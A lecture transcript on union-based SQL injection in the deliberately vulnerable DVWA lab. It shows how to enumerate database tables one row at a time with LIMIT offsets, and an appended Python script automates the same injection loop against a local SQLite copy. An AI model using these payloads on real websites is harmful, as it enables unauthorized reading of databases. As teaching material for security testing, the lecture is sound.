1 00:00:00,990 --> 00:00:07,000 In this lecture I'd like to cover a case that I face in pretty much 50 percent of the websites that
2 00:00:07,000 --> 00:00:09,150 I do penetration testing on.
3 00:00:09,190 --> 00:00:16,000 So let me first just run an exploit we've already seen. We're just going to run this statement,
4 00:00:16,000 --> 00:00:20,040 which will select the table name from information_schema.tables.
5 00:00:20,080 --> 00:00:25,080 So this should list all the tables that exist within our page.
6 00:00:25,330 --> 00:00:30,040 I have my security set to low at the moment, so I'm just going to paste that here,
7 00:00:30,940 --> 00:00:32,970 remove this extra one and hit enter.
8 00:00:35,730 --> 00:00:41,590 As you can see, it gets exploited and it shows us the table name here instead of number one.
9 00:00:41,790 --> 00:00:46,650 So we see all the table names that exist within this current database.
10 00:00:48,770 --> 00:00:55,790 Now the case that I'd like to cover is when you actually run the statement, so the website will be vulnerable,
11 00:00:55,790 --> 00:01:02,210 and when you run the statement you will only see one result at a time, and that's because the page is
12 00:01:02,570 --> 00:01:06,220 programmed in a way to display only one result at a time.
13 00:01:06,410 --> 00:01:12,730 To do this we're actually going to need to modify the code for the low security level of DVWA. I will
14 00:01:12,740 --> 00:01:15,770 do that now and then we'll come back to exploit it.
15 00:01:15,770 --> 00:01:18,670 So I'm actually just going to modify the code for DVWA.
16 00:01:18,680 --> 00:01:20,650 This is not part of the exploitation.
17 00:01:20,780 --> 00:01:24,860 This is just to make this exploit a little bit trickier.
18 00:01:24,960 --> 00:01:33,050 So I'm in Metasploitable now and I'm going to open the low security level of the SQL Injection
19 00:01:33,050 --> 00:01:33,620 file.
20 00:01:33,890 --> 00:01:41,180 So I'm going to use sudo because the file has root permissions, and I'm going to use nano as the text
21 00:01:41,180 --> 00:01:43,500 editor.
22 00:01:43,530 --> 00:01:53,570 So this is the program that I will use to modify the file, and the file is stored in /var/www/dvwa/
23 00:01:54,530 --> 00:02:02,270 vulnerabilities/sqli/source/ and then low.php.
24 00:02:02,670 --> 00:02:07,080 So again I'm just going to go through this command. What we're doing is we're saying
25 00:02:07,080 --> 00:02:09,850 sudo to run the file with root privileges.
26 00:02:09,850 --> 00:02:12,790 nano is the program that we're going to open the file with.
27 00:02:12,960 --> 00:02:21,920 And then the file is stored in /var/www/dvwa/vulnerabilities/sqli/source/low.php.
28 00:02:22,440 --> 00:02:29,060 I'm going to hit enter and it's asking me for the admin password. Now the root password is msfadmin,
29 00:02:29,060 --> 00:02:35,310 exactly like the username.
30 00:02:35,490 --> 00:02:37,800 We have the source here for the file.
31 00:02:37,800 --> 00:02:40,910 So I'm going to modify it here. I'm actually going to modify this.
32 00:02:40,980 --> 00:02:47,460 So what this loop does is it actually loops through all the characters, all the records, that this SQL
33 00:02:47,580 --> 00:02:50,110 statement gets right here,
34 00:02:50,250 --> 00:02:52,560 and then it displays them on screen.
35 00:02:52,560 --> 00:02:57,220 So what we want is to modify it to only display the first result.
36 00:02:57,270 --> 00:03:00,980 So I'm just going to comment this line. Two forward slashes are the comment.
37 00:03:00,990 --> 00:03:08,220 So basically this line will be ignored, and I'll also comment this line because it closes the while loop.
38 00:03:08,700 --> 00:03:10,620 So this line will be ignored as well.
39 00:03:11,940 --> 00:03:16,340 Now you don't really need to worry about what this means if you're not a programmer.
40 00:03:16,350 --> 00:03:21,320 It's not very important. Just comment these lines and we'll see what happens at the client side, because
41 00:03:21,320 --> 00:03:26,100 what we're interested in in this lecture is not the programming; we're interested in the penetration
42 00:03:26,100 --> 00:03:27,060 testing.
43 00:03:27,090 --> 00:03:29,820 So I'm just going to hit Ctrl+X to save this.
44 00:03:30,000 --> 00:03:36,170 I'm going to hit Y and enter, and that'll quit and save the file.
45 00:03:36,190 --> 00:03:41,170 So we're back here and I'm going to run exactly the same statement, so I'm not going to modify it.
46 00:03:41,200 --> 00:03:46,270 So I'm still saying union select table_name from information_schema.tables.
47 00:03:47,710 --> 00:03:50,260 I'm actually going to refresh the page.
48 00:03:50,510 --> 00:03:56,140 And as you can see, now this is not really working, or it is working but it has only shown us the first
49 00:03:56,560 --> 00:04:02,960 record that's been selected, which is the admin. So this is not even useful.
50 00:04:03,870 --> 00:04:08,910 So the first thing that I'm going to do: this is bringing us the record because the admin has the
51 00:04:08,910 --> 00:04:11,600 ID of number one.
52 00:04:11,610 --> 00:04:16,410 So what we're going to do now is we're actually just going to give it an invalid ID, so I'm going to
53 00:04:16,410 --> 00:04:21,610 give it a -1.
54 00:04:21,660 --> 00:04:26,910 And as you can see, now the statement works. We're getting a table that exists in information_schema.tables,
55 00:04:27,030 --> 00:04:29,940 but we're only getting one table at a time.
56 00:04:29,940 --> 00:04:32,230 We're not getting the full list of the tables.
57 00:04:32,580 --> 00:04:37,420 And this is because the page is programmed in a way that will only display one result.
58 00:04:37,610 --> 00:04:42,260 And this has happened to me a lot of times when I'm doing penetration testing.
59 00:04:42,300 --> 00:04:50,190 So keep in mind that we can run any SQL statement that we want on the server, so we can modify
60 00:04:50,190 --> 00:04:56,210 our SQL statement to iterate over all the records and display the content.
61 00:04:56,220 --> 00:05:02,970 So what we're going to do is this. Now obviously we can use the WHERE statement to only show database
62 00:05:03,090 --> 00:05:08,070 tables within your current database, but at the moment I want to show you how to
63 00:05:08,070 --> 00:05:10,450 iterate over all the tables.
64 00:05:10,710 --> 00:05:18,420 So what we're going to do instead is use the LIMIT keyword to specify which record we want to display
65 00:05:18,570 --> 00:05:26,190 with the current statement. This way we'll be able to iterate over the records one by one and display
66 00:05:26,250 --> 00:05:28,010 all of them.
67 00:05:28,210 --> 00:05:35,830 So the statement is going to be union select table_name from information_schema.tables, and we're
68 00:05:35,830 --> 00:05:41,550 going to say I want to limit. The LIMIT keyword takes two values.
69 00:05:41,710 --> 00:05:48,740 The first value is the location of the record that we want to start displaying records from,
70 00:05:48,790 --> 00:05:56,800 so where we want to start displaying records. So I want to start displaying records from the first record,
71 00:05:56,900 --> 00:06:04,840 so I'm going to put zero, because the record numbers start at 0. And the second value that the LIMIT keyword
72 00:06:04,840 --> 00:06:12,250 takes is the number of records that we want to display on screen, starting at the value that we specified
73 00:06:12,250 --> 00:06:13,660 in here.
74 00:06:13,660 --> 00:06:19,000 Now we know that this page right here can only show me one record at a time.
75 00:06:19,030 --> 00:06:22,520 So the second value to the LIMIT keyword can only be one
76 00:06:22,570 --> 00:06:24,110 in this case.
77 00:06:24,160 --> 00:06:30,740 So basically what we're saying is we want to select the table name from information_schema.tables.
78 00:06:30,880 --> 00:06:36,250 I only want to display one record, starting from record 0.
79 00:06:36,250 --> 00:06:40,490 So if I copy this and paste it here,
80 00:06:44,270 --> 00:06:51,680 you'll see I'll get the first table right now. And then if I want to go to the second table, all I have
81 00:06:51,680 --> 00:06:58,430 to do is modify this. So like I said, this value, the first value in here, means I want to start at record
82 00:06:58,430 --> 00:06:59,240 0.
83 00:06:59,240 --> 00:07:07,310 So if I want to start at record 1 I'm just going to put one, and then I can copy this and paste it up
84 00:07:07,350 --> 00:07:11,220 in here again.
85 00:07:11,340 --> 00:07:13,610 As you can see, we got the next table.
86 00:07:13,650 --> 00:07:20,290 Now again, if I want to get the table after this, all I have to do is modify this and set it to 2.
87 00:07:20,400 --> 00:07:25,440 And that means that I want to start displaying from record 2, and I only want to display
88 00:07:25,440 --> 00:07:26,880 one record.
89 00:07:26,880 --> 00:07:31,610 Again, if I hit enter, as you can see I'm getting the next table.
90 00:07:31,680 --> 00:07:38,000 I can keep doing this to iterate over all the records manually.
91 00:07:38,020 --> 00:07:41,880 Now we can also enhance the statement by using the WHERE clause.
92 00:07:41,890 --> 00:07:50,140 So before the LIMIT we can say I want to select table_name from information_schema.tables where table_schema
93 00:07:50,140 --> 00:07:57,370 is equal to dvwa.
94 00:07:57,420 --> 00:08:06,240 Now if we paste this in here, as you can see this has shown me the users table, and again I can iterate over
95 00:08:06,390 --> 00:08:13,740 the tables by changing the number here. So this is displaying the record at offset 1.
96 00:08:13,740 --> 00:08:17,420 I can set this to 0 to display the first record.
97 00:08:17,520 --> 00:08:23,930 And as you can see, the first table, or the first record, is guestbook. And that's it.
98 00:08:23,930 --> 00:08:27,830 So just a quick, nice lecture to show you how to bypass this problem
99 00:08:27,920 --> 00:08:35,090 if you face it in pages that would only display one value or one record for you at a time.
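The bypass walked through in this lecture, as an added example from the editor that is not part of the lecture, of DVWA or of Metasploitable. It reproduces the situation in a self-contained script: a deliberately vulnerable lookup that concatenates the id into the query and renders only the first row (the effect of commenting out the while loop in low.php), then a loop that moves the LIMIT offset one record at a time until the page shows nothing. Assumptions: an in-memory SQLite database with constructed sample tables stands in for MySQL; sqlite_master with `type = 'table'` plays the role of information_schema.tables filtered by table_schema; the UNION supplies two columns because the original query selects first_name and last_name; and `ORDER BY 1` is added to the payload so the offsets walk a stable order (the lecture's payload does not use it, and on MySQL the order without it is not guaranteed). The `-1` id matters for the same reason as in the lecture: with a valid id the page's own row comes first and hides the injected one.

```python
import sqlite3

# Constructed sample schema standing in for DVWA's database (not the real DVWA data).
SAMPLE_SCHEMA = """
CREATE TABLE guestbook (comment_id INTEGER PRIMARY KEY, comment TEXT, name TEXT);
CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT);
INSERT INTO users VALUES (1, 'admin', 'admin');
INSERT INTO users VALUES (2, 'Gordon', 'Brown');
"""


def build_db():
    """In-memory SQLite database used in place of the MySQL server behind DVWA."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def lookup_user(conn, user_id):
    """Deliberately vulnerable, mirroring low.php after the lecture's edit:
    the id is concatenated into the query and only ONE row is rendered."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchone()  # fetchone(): the page shows a single record


def table_payload(offset):
    """UNION payload for one row of the table list, at the given LIMIT offset.
    sqlite_master WHERE type = 'table' is the SQLite analogue of
    information_schema.tables WHERE table_schema = 'dvwa'. The trailing
    '-- ' comments out the closing quote of the original query."""
    return (
        "-1' UNION SELECT name, 2 FROM sqlite_master "
        f"WHERE type = 'table' ORDER BY 1 LIMIT {offset},1 -- "
    )


def enumerate_tables(conn):
    """Walk the UNION result one row at a time by moving the LIMIT offset,
    exactly what the lecture does by hand, stopping when the page shows nothing."""
    found = []
    offset = 0
    while True:
        row = lookup_user(conn, table_payload(offset))
        if row is None:
            break
        found.append(row[0])
        offset += 1
    return found


if __name__ == "__main__":
    db = build_db()
    # With a valid id the page's own record wins and masks the injection.
    print("id 1 + union ->", lookup_user(db, "1" + table_payload(0)[2:]))
    for name in enumerate_tables(db):
        print("table:", name)
```

Run as a script it prints the admin row for the valid-id payload and then the two sample tables; in practice the same loop is what you automate with a short HTTP client once you have confirmed the injection point by hand.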